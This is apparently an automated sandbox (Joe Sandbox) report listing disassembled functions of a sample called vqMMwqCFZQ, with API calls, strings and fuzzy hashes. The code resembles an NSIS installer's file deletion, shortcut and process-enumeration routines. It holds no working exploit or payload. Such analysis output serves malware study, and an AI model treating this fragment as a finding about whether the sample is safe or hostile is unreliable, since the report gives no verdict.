                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                          • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                          • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                          • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                          Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                          • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                          • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                          • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                          Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                          • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                          • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                          • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                          Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                          Download Yara Rule
                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                          • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                          • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                          • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
                                          Function 00403859 Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                          Download Yara Rule
                                          APIs
                                          • CloseHandle.KERNELBASE(FFFFFFFF,00403AD1,?), ref: 00403864
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID:
                                          • API String ID: 2962429428-0
                                          • Opcode ID: a114d1ad3d6f72424773905f6d3d8555ffb504a96b4f495319bf21f79649ad7b
                                          • Instruction ID: b9bdbc8744521ee651ba7bc90111acac5a2c88e2b86e9c74d328a3688b9dc09a
                                          • Opcode Fuzzy Hash: a114d1ad3d6f72424773905f6d3d8555ffb504a96b4f495319bf21f79649ad7b
                                          • Instruction Fuzzy Hash: 7BC0223810020092E1242F34AE0EB063A04F740330F500B3EF0F2F02F0D73C8640006D

                                          Non-executed Functions

                                          Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                          • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                          • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                          • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                          • DeleteObject.GDI32(?), ref: 00404A79
                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                          • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                          • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                          • GlobalFree.KERNEL32(?), ref: 00404DAC
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                          • ShowWindow.USER32(?,00000000), ref: 00404F49
                                          • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                          • ShowWindow.USER32(00000000), ref: 00404F5B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                          • String ID: $ @$M$N
                                          • API String ID: 1638840714-3479655940
                                          • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                          • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                          • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                          • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                          Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                          • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                          • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                          • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                          • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                          • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                          • SetWindowTextW.USER32(?,?), ref: 00404583
                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                          • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                          • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                          • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                            • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                            • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                          • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                          • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                          • String ID: 82D$@%F$@rD$A
                                          • API String ID: 3347642858-1086125096
                                          • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                          • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                          • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                          • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                          Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                          • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                          • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                          • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                          • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                          • CloseHandle.KERNEL32(?), ref: 004071E6
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                          • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                          • API String ID: 1916479912-1189179171
                                          • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                          • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                          • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                          • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                          Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                          • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                          • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                          • lstrlenW.KERNEL32(?), ref: 00406D2C
                                          • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                          • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                          • FindClose.KERNEL32(?), ref: 00406E33
                                          Strings
                                          • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                          • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                          • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                          • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                          • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                          • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                          • \*.*, xrefs: 00406D03
                                          • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                          • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                          • API String ID: 2035342205-3294556389
                                          • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                          • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                          • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                          • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                          Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                          • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                          • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                          • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                          • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                          • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                          • API String ID: 3581403547-784952888
                                          • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                          • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                          • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                          • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                          Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                          Strings
                                          • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: CreateInstance
                                          • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                          • API String ID: 542301482-1377821865
                                          • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                          • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                          • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                          • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                          Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: FileFindFirst
                                          • String ID:
                                          • API String ID: 1974802433-0
                                          • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                          • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                          • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                          • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                          Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                          • lstrlenW.KERNEL32(?), ref: 004063CC
                                          • GetVersionExW.KERNEL32(?), ref: 0040642A
                                            • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                          • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                          • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                          • GlobalFree.KERNEL32(?), ref: 004064DD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                          • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                          • API String ID: 20674999-2124804629
